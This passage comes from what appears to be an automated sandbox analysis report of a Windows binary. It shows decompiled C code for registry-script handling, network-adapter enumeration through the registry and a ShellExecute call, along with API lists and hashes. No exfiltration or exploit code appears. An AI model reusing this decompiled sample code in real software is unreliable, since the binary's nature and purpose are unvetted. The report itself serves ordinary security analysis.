											 *_t27 =  *(_t112 - 0x60) - 1;
											__eflags =  *_t27;
											if( *_t27 != 0) {
												goto L28;
											}
											__eflags =  *((char*)(_t112 - 0x52)) - 1;
											if(__eflags != 0) {
												goto L28;
											}
											_push(L"\r\n\t}\r\n}\r\n");
											_t65 = E00C9924D(_t89, _t112 - 0x6c, _t109, _t111, __eflags);
											__eflags = _t65;
											if(_t65 == 0) {
												goto L31;
											}
											 *((char*)(_t112 - 0x52)) = 0;
										}
										goto L28;
									}
									__eflags =  *((char*)(_t112 - 0x51));
									if( *((char*)(_t112 - 0x51)) != 0) {
										_t66 = E00C98AF6(_t111);
										__eflags = _t66;
										if(_t66 == 0) {
											 *_t111 = CharNextW( *_t111);
											_t68 = E00C98B53(_t89, _t112 - 0x6c, _t67, 1);
											__eflags = _t68;
											if(_t68 == 0) {
												goto L31;
											}
											goto L20;
										}
										 *((char*)(_t112 - 0x51)) = 0;
										goto L21;
									}
									 *((char*)(_t112 - 0x51)) = 1;
									goto L28;
								}
								_t70 = E00D00BE7( *_t111, L"HKCR");
								__eflags = _t70;
								if(_t70 == 0) {
									goto L14;
								}
								_t105 =  *_t111;
								__eflags = _t70 - _t105;
								if(__eflags != 0) {
									goto L14;
								}
								_t71 = CharNextW(_t105);
								 *_t111 = _t71;
								_t72 = CharNextW(_t71);
								 *_t111 = _t72;
								_t73 = CharNextW(_t72);
								 *_t111 = _t73;
								_t74 = CharNextW(_t73);
								_push(L"HKCU\r\n{\tSoftware\r\n\t{\r\n\t\tClasses");
								 *_t111 = _t74;
								_t75 = E00C9924D(_t89, _t112 - 0x6c, _t109, _t111, __eflags);
								__eflags = _t75;
								if(_t75 == 0) {
									goto L31;
								}
								 *((char*)(_t112 - 0x52)) = 1;
								goto L14;
								L39:
								_t61 = CharNextW( *_t111);
								 *_t111 = _t61;
								__eflags =  *_t61;
							} while ( *_t61 != 0);
							goto L43;
						}
						L5:
						__imp__CoTaskMemFree( *(_t112 - 0x64));
						L48:
						return E00D01646(_t89, _t109, _t111);
					}
					__imp__CoTaskMemFree(0);
				}
			}
































                                                                                                                                                                                          0x00c9948f
                                                                                                                                                                                          0x00c9948f
                                                                                                                                                                                          0x00c99496
                                                                                                                                                                                          0x00c9949b
                                                                                                                                                                                          0x00c9949e
                                                                                                                                                                                          0x00c994a1
                                                                                                                                                                                          0x00c994a3
                                                                                                                                                                                          0x00c994a8
                                                                                                                                                                                          0x00c994b6
                                                                                                                                                                                          0x00c994b6
                                                                                                                                                                                          0x00c994c6
                                                                                                                                                                                          0x00c994cd
                                                                                                                                                                                          0x00c994d3
                                                                                                                                                                                          0x00c994e6
                                                                                                                                                                                          0x00c994ed
                                                                                                                                                                                          0x00c994ef
                                                                                                                                                                                          0x00c994f4
                                                                                                                                                                                          0x00c994f7
                                                                                                                                                                                          0x00c994f9
                                                                                                                                                                                          0x00c9950c
                                                                                                                                                                                          0x00c99510
                                                                                                                                                                                          0x00c99514
                                                                                                                                                                                          0x00c99518
                                                                                                                                                                                          0x00c9951c
                                                                                                                                                                                          0x00c996af
                                                                                                                                                                                          0x00c996af
                                                                                                                                                                                          0x00c996b3
                                                                                                                                                                                          0x00c996bc
                                                                                                                                                                                          0x00c996c0
                                                                                                                                                                                          0x00c996c0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c996b3
                                                                                                                                                                                          0x00c99522
                                                                                                                                                                                          0x00c99528
                                                                                                                                                                                          0x00c99528
                                                                                                                                                                                          0x00c9952c
                                                                                                                                                                                          0x00c995f4
                                                                                                                                                                                          0x00c995f4
                                                                                                                                                                                          0x00c995f6
                                                                                                                                                                                          0x00c995fa
                                                                                                                                                                                          0x00c9969f
                                                                                                                                                                                          0x00c996a4
                                                                                                                                                                                          0x00c996a6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c996a8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c996a8
                                                                                                                                                                                          0x00c99601
                                                                                                                                                                                          0x00c99603
                                                                                                                                                                                          0x00c99605
                                                                                                                                                                                          0x00c99609
                                                                                                                                                                                          0x00c99629
                                                                                                                                                                                          0x00c9962e
                                                                                                                                                                                          0x00c99632
                                                                                                                                                                                          0x00c99634
                                                                                                                                                                                          0x00c996c7
                                                                                                                                                                                          0x00c996c7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c996c7
                                                                                                                                                                                          0x00c9963a
                                                                                                                                                                                          0x00c9963e
                                                                                                                                                                                          0x00c99640
                                                                                                                                                                                          0x00c99643
                                                                                                                                                                                          0x00c996d3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c996d3
                                                                                                                                                                                          0x00c99651
                                                                                                                                                                                          0x00c99659
                                                                                                                                                                                          0x00c99660
                                                                                                                                                                                          0x00c99665
                                                                                                                                                                                          0x00c99667
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c99669
                                                                                                                                                                                          0x00c9966d
                                                                                                                                                                                          0x00c99672
                                                                                                                                                                                          0x00c99674
                                                                                                                                                                                          0x00c9961a
                                                                                                                                                                                          0x00c9961a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9961a
                                                                                                                                                                                          0x00c99676
                                                                                                                                                                                          0x00c99678
                                                                                                                                                                                          0x00c99684
                                                                                                                                                                                          0x00c99684
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9967a
                                                                                                                                                                                          0x00c9967a
                                                                                                                                                                                          0x00c9967c
                                                                                                                                                                                          0x00c9967e
                                                                                                                                                                                          0x00c99680
                                                                                                                                                                                          0x00c99680
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9967a
                                                                                                                                                                                          0x00c99611
                                                                                                                                                                                          0x00c99616
                                                                                                                                                                                          0x00c99618
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c99618
                                                                                                                                                                                          0x00c99532
                                                                                                                                                                                          0x00c99536
                                                                                                                                                                                          0x00c9957e
                                                                                                                                                                                          0x00c99582
                                                                                                                                                                                          0x00c99583
                                                                                                                                                                                          0x00c99586
                                                                                                                                                                                          0x00c995ba
                                                                                                                                                                                          0x00c995ba
                                                                                                                                                                                          0x00c995be
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c995c0
                                                                                                                                                                                          0x00c995c2
                                                                                                                                                                                          0x00c995c5
                                                                                                                                                                                          0x00c995c9
                                                                                                                                                                                          0x00c995cb
                                                                                                                                                                                          0x00c995cb
                                                                                                                                                                                          0x00c995cb
                                                                                                                                                                                          0x00c995cb
                                                                                                                                                                                          0x00c995ce
                                                                                                                                                                                          0x00c995d2
                                                                                                                                                                                          0x00c995d4
                                                                                                                                                                                          0x00c995d4
                                                                                                                                                                                          0x00c995d4
                                                                                                                                                                                          0x00c995d7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c995d9
                                                                                                                                                                                          0x00c995dd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c995df
                                                                                                                                                                                          0x00c995e7
                                                                                                                                                                                          0x00c995ec
                                                                                                                                                                                          0x00c995ee
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c995f0
                                                                                                                                                                                          0x00c995f0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c995d2
                                                                                                                                                                                          0x00c99588
                                                                                                                                                                                          0x00c9958c
                                                                                                                                                                                          0x00c99596
                                                                                                                                                                                          0x00c9959b
                                                                                                                                                                                          0x00c9959d
                                                                                                                                                                                          0x00c995af
                                                                                                                                                                                          0x00c995b1
                                                                                                                                                                                          0x00c995b6
                                                                                                                                                                                          0x00c995b8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c995b8
                                                                                                                                                                                          0x00c9959f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9959f
                                                                                                                                                                                          0x00c9958e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9958e
                                                                                                                                                                                          0x00c99540
                                                                                                                                                                                          0x00c99547
                                                                                                                                                                                          0x00c99549
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9954b
                                                                                                                                                                                          0x00c9954d
                                                                                                                                                                                          0x00c9954f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c99552
                                                                                                                                                                                          0x00c99555
                                                                                                                                                                                          0x00c99557
                                                                                                                                                                                          0x00c9955a
                                                                                                                                                                                          0x00c9955c
                                                                                                                                                                                          0x00c9955f
                                                                                                                                                                                          0x00c99561
                                                                                                                                                                                          0x00c99563
                                                                                                                                                                                          0x00c9956b
                                                                                                                                                                                          0x00c9956d
                                                                                                                                                                                          0x00c99572
                                                                                                                                                                                          0x00c99574
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9957a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c99687
                                                                                                                                                                                          0x00c99689
                                                                                                                                                                                          0x00c9968b
                                                                                                                                                                                          0x00c9968d
                                                                                                                                                                                          0x00c9968d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c99697
                                                                                                                                                                                          0x00c994fb
                                                                                                                                                                                          0x00c994fe
                                                                                                                                                                                          0x00c996e4
                                                                                                                                                                                          0x00c996e9
                                                                                                                                                                                          0x00c996e9
                                                                                                                                                                                          0x00c994d6
                                                                                                                                                                                          0x00c994dc

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C99496
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,00000064), ref: 00C994BA
                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00C994D6
                                                                                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 00C994FE
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeTask$H_prolog3_lstrlen
                                                                                                                                                                                          • String ID: }}$HKCR$HKCU{Software{Classes
                                                                                                                                                                                          • API String ID: 1877075980-1142484189
                                                                                                                                                                                          • Opcode ID: 588f308a857a3aaffe61544258cff6d3c17a740429f18a59a994d2e739c8c2d1
                                                                                                                                                                                          • Instruction ID: fc2eafd8a853ffeeff7d2ea7f82cdd2c165b7a8f33768b0e13a074bb5ac2121f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 588f308a857a3aaffe61544258cff6d3c17a740429f18a59a994d2e739c8c2d1
                                                                                                                                                                                          • Instruction Fuzzy Hash: F27171709043859FDF21EFADC88CBAEBBB8EF25304F14041DE496AB195DB759985CB20
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C945C0 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 221registrystringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                          			E00C945C0(void* __ebp, intOrPtr _a4) {
				char _v4;
				intOrPtr _v8;
				char _v12;
				signed int _v20;
				short _v540;
				char _v1060;
				char _v1164;
				char _v1268;
				char _v1372;
				struct _FILETIME _v1380;
				int _v1384;
				int _v1388;
				int _v1392;
				void* _v1396;
				intOrPtr _v1400;
				int _v1404;
				char _v1408;
				char _v1412;
				void* _v1416;
				int _v1420;
				int _v1424;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t75;
				signed int _t77;
				int _t82;
				int _t87;
				intOrPtr* _t90;
				intOrPtr* _t95;
				void* _t106;
				void* _t109;
				void* _t117;
				intOrPtr _t125;
				intOrPtr _t127;
				CHAR* _t132;
				void* _t137;
				void* _t138;
				void* _t139;
				void* _t145;
				void* _t146;
				void* _t150;
				void* _t151;
				signed int _t152;

				_push(0xffffffff);
				_push(0xd38d36);
				_push( *[fs:0x0]);
				_t152 = _t151 - 0x588;
				_t75 =  *0xd64070; // 0x8a9e1774
				_v20 = _t75 ^ _t152;
				_push(__ebp);
				_push(_t138);
				_t77 =  *0xd64070; // 0x8a9e1774
				_push(_t77 ^ _t152);
				 *[fs:0x0] =  &_v12;
				_v1400 = _a4;
				_v1392 = 0;
				_v1388 = 0;
				_v4 = 0;
				_v1416 = 0;
				if(RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkCards", 0, 8,  &_v1416) != 0) {
					L34:
					_t82 = 0;
					goto L35;
				} else {
					_t146 = _v1416;
					_v1392 = _t146;
					_v1388 = 0;
					E00D006A0(_t138,  &_v1268, 0, 0x64);
					E00D006A0(_t138,  &_v1372, 0, 0x64);
					_t152 = _t152 + 0x18;
					_t87 = 0;
					_v1404 = 0;
					while(1) {
						_t135 =  &_v1384;
						_v1384 = 0x104;
						if(RegEnumKeyExW(_t146, _t87,  &_v540,  &_v1384, 0, 0, 0,  &_v1380) != 0) {
							break;
						}
						_v1424 = 0;
						_v1420 = 0;
						_t135 =  &_v1396;
						_v4 = 1;
						_v1396 = 0;
						if(RegOpenKeyExW(_t146,  &_v540, 0, 1,  &_v1396) != 0) {
							_v4 = 0;
							L20:
							_t87 = _v1404 + 1;
							_v1420 = 0;
							_v1404 = _t87;
							if(_t87 < 0x64) {
								continue;
							}
							break;
						}
						_t150 = _v1396;
						_v1412 = 0x104;
						_t143 =  &_v1412;
						_v1424 = _t150;
						_v1420 = 0;
						if(E00C92550( &_v1412,  &_v1060,  &_v1424, L"ServiceName") != 0) {
							L17:
							_v4 = 0;
							if(_t150 != 0) {
								RegCloseKey(_t150);
								_v1424 = 0;
							}
							_t146 = _v1416;
							goto L20;
						}
						_t135 =  &_v1412;
						_v1412 = 0;
						_v1408 = 0;
						_t106 = E00C941D0( &_v1408, _t150,  &_v1060,  &_v1412);
						_t152 = _t152 + 8;
						if(_t106 == 0 || _v1412 != 0) {
							E00D006A0(_t143,  &_v1164, 0, 0x64);
							_t135 =  &_v1164;
							_t109 = E00C943E0( &_v1408, _t150,  &_v1060,  &_v1164);
							_t152 = _t152 + 0x14;
							if(_t109 == 0) {
								goto L17;
							}
							if(_v1408 == 0) {
								if(_v1268 == 0 || lstrcmpA( &_v1164,  &_v1268) < 0) {
									_t132 =  &_v1268;
									L16:
									_t135 = 0x64;
									E00C92750( &_v1164, _t132, 0x64);
								}
								goto L17;
							}
							if(_v1372 == 0) {
								L11:
								_t132 =  &_v1372;
								goto L16;
							}
							_t135 =  &_v1164;
							if(lstrcmpA( &_v1164,  &_v1372) >= 0) {
								goto L17;
							}
							goto L11;
						} else {
							goto L17;
						}
					}
					if(_v1268 == 0) {
						if(_v1372 == 0) {
							_v4 = 0xffffffff;
							if(_t146 != 0) {
								RegCloseKey(_t146);
							}
							goto L34;
						}
						_t90 =  &_v1372;
						_t135 = _t90 + 1;
						do {
							_t125 =  *_t90;
							_t90 = _t90 + 1;
						} while (_t125 != 0);
						E00C91B50(_v1400,  &_v1372, _t90 - _t135,  &_v1372);
						_v8 = 0xffffffff;
						if(_t146 == 0) {
							L26:
							_t82 = 1;
							L35:
							 *[fs:0x0] = _v12;
							_pop(_t139);
							_pop(_t145);
							_pop(_t117);
							return E00D0071A(_t82, _t117, _v20 ^ _t152, _t135, _t139, _t145);
						}
						RegCloseKey(_t146);
						_t82 = 1;
						goto L35;
					}
					_t95 =  &_v1268;
					_t137 = _t95 + 1;
					do {
						_t127 =  *_t95;
						_t95 = _t95 + 1;
					} while (_t127 != 0);
					_t135 =  &_v1268;
					E00C91B50(_v1400, _t127, _t95 - _t137,  &_v1268);
					_v8 = 0xffffffff;
					if(_t146 != 0) {
						RegCloseKey(_t146);
					}
					goto L26;
				}
			}















































                                                                                                                                                                                          0x00c945c0
                                                                                                                                                                                          0x00c945c2
                                                                                                                                                                                          0x00c945cd
                                                                                                                                                                                          0x00c945ce
                                                                                                                                                                                          0x00c945d4
                                                                                                                                                                                          0x00c945db
                                                                                                                                                                                          0x00c945e3
                                                                                                                                                                                          0x00c945e5
                                                                                                                                                                                          0x00c945e6
                                                                                                                                                                                          0x00c945ed
                                                                                                                                                                                          0x00c945f5
                                                                                                                                                                                          0x00c94604
                                                                                                                                                                                          0x00c94608
                                                                                                                                                                                          0x00c9460c
                                                                                                                                                                                          0x00c9461d
                                                                                                                                                                                          0x00c94629
                                                                                                                                                                                          0x00c94635
                                                                                                                                                                                          0x00c948a2
                                                                                                                                                                                          0x00c948a2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9463b
                                                                                                                                                                                          0x00c9463b
                                                                                                                                                                                          0x00c9464a
                                                                                                                                                                                          0x00c9464e
                                                                                                                                                                                          0x00c94652
                                                                                                                                                                                          0x00c94662
                                                                                                                                                                                          0x00c94667
                                                                                                                                                                                          0x00c9466a
                                                                                                                                                                                          0x00c9466c
                                                                                                                                                                                          0x00c94670
                                                                                                                                                                                          0x00c94678
                                                                                                                                                                                          0x00c9468c
                                                                                                                                                                                          0x00c94698
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9469e
                                                                                                                                                                                          0x00c946a2
                                                                                                                                                                                          0x00c946a6
                                                                                                                                                                                          0x00c946b6
                                                                                                                                                                                          0x00c946bf
                                                                                                                                                                                          0x00c946cb
                                                                                                                                                                                          0x00c94789
                                                                                                                                                                                          0x00c947e7
                                                                                                                                                                                          0x00c947eb
                                                                                                                                                                                          0x00c947ef
                                                                                                                                                                                          0x00c947f3
                                                                                                                                                                                          0x00c947f7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c947f7
                                                                                                                                                                                          0x00c946d1
                                                                                                                                                                                          0x00c946de
                                                                                                                                                                                          0x00c946e3
                                                                                                                                                                                          0x00c946ee
                                                                                                                                                                                          0x00c946f2
                                                                                                                                                                                          0x00c946fd
                                                                                                                                                                                          0x00c947cd
                                                                                                                                                                                          0x00c947cd
                                                                                                                                                                                          0x00c947d6
                                                                                                                                                                                          0x00c947d9
                                                                                                                                                                                          0x00c947df
                                                                                                                                                                                          0x00c947df
                                                                                                                                                                                          0x00c947e3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c947e3
                                                                                                                                                                                          0x00c94703
                                                                                                                                                                                          0x00c9470f
                                                                                                                                                                                          0x00c94713
                                                                                                                                                                                          0x00c94717
                                                                                                                                                                                          0x00c9471c
                                                                                                                                                                                          0x00c94721
                                                                                                                                                                                          0x00c94738
                                                                                                                                                                                          0x00c94740
                                                                                                                                                                                          0x00c94754
                                                                                                                                                                                          0x00c94759
                                                                                                                                                                                          0x00c9475e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c94764
                                                                                                                                                                                          0x00c94799
                                                                                                                                                                                          0x00c947b5
                                                                                                                                                                                          0x00c947bc
                                                                                                                                                                                          0x00c947c3
                                                                                                                                                                                          0x00c947c8
                                                                                                                                                                                          0x00c947c8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c94799
                                                                                                                                                                                          0x00c9476a
                                                                                                                                                                                          0x00c94783
                                                                                                                                                                                          0x00c94783
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c94783
                                                                                                                                                                                          0x00c94771
                                                                                                                                                                                          0x00c94781
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c94721
                                                                                                                                                                                          0x00c94804
                                                                                                                                                                                          0x00c9484d
                                                                                                                                                                                          0x00c9488c
                                                                                                                                                                                          0x00c94899
                                                                                                                                                                                          0x00c9489c
                                                                                                                                                                                          0x00c9489c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c94899
                                                                                                                                                                                          0x00c9484f
                                                                                                                                                                                          0x00c94853
                                                                                                                                                                                          0x00c94856
                                                                                                                                                                                          0x00c94856
                                                                                                                                                                                          0x00c94858
                                                                                                                                                                                          0x00c94859
                                                                                                                                                                                          0x00c9486a
                                                                                                                                                                                          0x00c9486f
                                                                                                                                                                                          0x00c9487c
                                                                                                                                                                                          0x00c94842
                                                                                                                                                                                          0x00c94842
                                                                                                                                                                                          0x00c948a4
                                                                                                                                                                                          0x00c948ab
                                                                                                                                                                                          0x00c948b3
                                                                                                                                                                                          0x00c948b4
                                                                                                                                                                                          0x00c948b6
                                                                                                                                                                                          0x00c948cb
                                                                                                                                                                                          0x00c948cb
                                                                                                                                                                                          0x00c9487f
                                                                                                                                                                                          0x00c94885
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c94885
                                                                                                                                                                                          0x00c94806
                                                                                                                                                                                          0x00c9480d
                                                                                                                                                                                          0x00c94810
                                                                                                                                                                                          0x00c94810
                                                                                                                                                                                          0x00c94812
                                                                                                                                                                                          0x00c94813
                                                                                                                                                                                          0x00c94819
                                                                                                                                                                                          0x00c94827
                                                                                                                                                                                          0x00c9482c
                                                                                                                                                                                          0x00c94839
                                                                                                                                                                                          0x00c9483c
                                                                                                                                                                                          0x00c9483c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c94839

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards,00000000,00000008,?,8A9E1774,00000000,?,?,?), ref: 00C9462D
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C94652
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C94662
                                                                                                                                                                                          • RegEnumKeyExW.ADVAPI32 ref: 00C94690
                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?), ref: 00C946C3
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C94738
                                                                                                                                                                                          • lstrcmpA.KERNEL32(?,?,?,?,?,?,?,00000001,?,?,?,?,?,?,?), ref: 00C94779
                                                                                                                                                                                          • lstrcmpA.KERNEL32(?,?,?,?,?,?,?,00000001,?,?,?,?,?,?,?), ref: 00C947AB
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,ServiceName), ref: 00C947D9
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00C9483C
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00C9487F
                                                                                                                                                                                            • Part of subcall function 00C92550: RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00C90027), ref: 00C92577
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00C9489C
                                                                                                                                                                                            • Part of subcall function 00C941D0: RegOpenKeyExW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318},00000000,00000008,?,?,?,?,00000000), ref: 00C9421E
                                                                                                                                                                                            • Part of subcall function 00C941D0: RegEnumKeyExW.ADVAPI32 ref: 00C94264
                                                                                                                                                                                            • Part of subcall function 00C941D0: RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00C9428B
                                                                                                                                                                                            • Part of subcall function 00C941D0: StrCmpIW.SHLWAPI(?,?,?,NetCfgInstanceId), ref: 00C942C8
                                                                                                                                                                                            • Part of subcall function 00C941D0: RegCloseKey.ADVAPI32(?,?,NetCfgInstanceId), ref: 00C942D7
                                                                                                                                                                                            • Part of subcall function 00C941D0: RegCloseKey.ADVAPI32(?), ref: 00C9435B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • ServiceName, xrefs: 00C946D5
                                                                                                                                                                                          • SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards, xrefs: 00C94618
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Close$Open$_memset$Enumlstrcmp$QueryValue
                                                                                                                                                                                          • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards$ServiceName
                                                                                                                                                                                          • API String ID: 425290413-1795789498
                                                                                                                                                                                          • Opcode ID: 528e35a35ee877e3694d120d53e4a38e21db15700a826d8efca59026fff3ae17
                                                                                                                                                                                          • Instruction ID: 6d658250d1e882ee2580e42009f7a85926197623c316eb77e61f08dd8ff9cac1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 528e35a35ee877e3694d120d53e4a38e21db15700a826d8efca59026fff3ae17
                                                                                                                                                                                          • Instruction Fuzzy Hash: 858152B15083849FD724DF64C888E9BBBE8BB89704F444A1EF5D993281E7719A05CF63
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CC6971 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 127commemoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 28%
                                                                                                                                                                                          			E00CC6971(void* __ecx, char* __edx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				signed int _v32;
				char _v4126;
				short _v4128;
				void* _v4132;
				struct HWND__* _v4136;
				char _v4152;
				intOrPtr _v4160;
				char _v4168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t36;
				char* _t45;
				void* _t46;
				intOrPtr* _t48;
				intOrPtr _t51;
				intOrPtr* _t52;
				short _t55;
				intOrPtr* _t56;
				intOrPtr _t61;
				void* _t62;
				char* _t73;
				void* _t74;
				void* _t75;
				struct HWND__* _t76;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;

				_t72 = __edx;
				_push(0xfffffffe);
				_push(0xd53158);
				_push(E00D00A50);
				_push( *[fs:0x0]);
				_push(__ecx);
				_push(__ecx);
				E00D00E90(0x102c);
				_t35 =  *0xd64070; // 0x8a9e1774
				_v12 = _v12 ^ _t35;
				_t36 = _t35 ^ _t80;
				_v32 = _t36;
				_push(_t74);
				_push(_t36);
				 *[fs:0x0] =  &_v20;
				_v28 = _t81;
				_t61 = _a4;
				_v4128 = 0;
				E00D006A0(_t74,  &_v4126, 0, 0xffe);
				E00CC6919( &_v4128, 0x1000, L"\"%s\"", _t61);
				if(ShellExecuteW(0, L"open", L"Explorer",  &_v4128, 0, 5) <= 0x20) {
					_v8 = 0;
					_v4132 = 0;
